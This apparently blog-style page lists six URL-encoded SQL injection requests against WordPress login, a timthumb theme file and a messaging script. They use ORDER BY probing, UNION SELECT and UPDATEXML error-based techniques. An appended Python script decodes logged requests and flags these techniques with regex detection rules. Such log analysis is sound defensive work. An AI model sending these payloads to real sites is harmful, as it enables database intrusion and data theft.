Common SQL injection attack payloads are as follows:
/wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-content%2Fuploads%2F2017%2F03%2F12.png&w=-9611%22%20UNION%20ALL%20SELECT%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303--%20&h=210&zc=1
/newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x3a6e676f3a%2C%28SELECT%20%28CASE%20WHEN%20%283114%3D3114%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7262793a%29%2C6430%29%20%20AND%20%22Enli%22%3D%22Enli
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-content%2Fuploads%2F2017%2F03%2F12.png&w=-2372%22%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985--%20&h=210&zc=1
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23
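
A log-triage sketch for request URIs like those listed above, added here as an example and not part of the original page: it percent-decodes each query parameter and reports which parameter matches which of the three techniques visible in the list (ORDER BY column probing, UNION SELECT, UPDATEXML error-based extraction). The rule names, function names and all sample requests except the first are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One signature per technique seen in the payloads above.
# Rule names are labels made up for this example.
RULES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("error_based_updatexml", re.compile(r"\bupdatexml\s*\(", re.I)),
]

def decode(value, max_rounds=3):
    """Percent-decode until stable (bounded) so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_sqli(request_uri):
    """Return (parameter, rule) pairs for every query parameter matching a rule."""
    hits = []
    query = urlsplit(request_uri).query
    # parse_qsl performs the first round of percent-decoding per parameter
    for name, value in parse_qsl(query, keep_blank_values=True):
        text = decode(value)
        hits += [(name, rule) for rule, pattern in RULES if pattern.search(text)]
    return hits

# SAMPLES[0] is the first request from the list above; the rest are constructed.
SAMPLES = [
    "/wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23",
    "/thumb.php?src=a.png&w=-1%22%20UNION%20ALL%20SELECT%201%2C%201--%20&h=210",
    "/newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%281%2C0x2e%2C1%29",
    # double-encoded variant: only matches after the second decoding round
    "/wp-login.php?action=x%2527%2520ORDER%2520BY%25201%2523",
    # benign request: must produce no findings
    "/wp-login.php?action=lostpassword",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(find_sqli(uri) or "clean", uri)
```

Reporting the parameter name alongside the rule shows which input carried the injection attempt (`action`, `w` and `title` in the requests above).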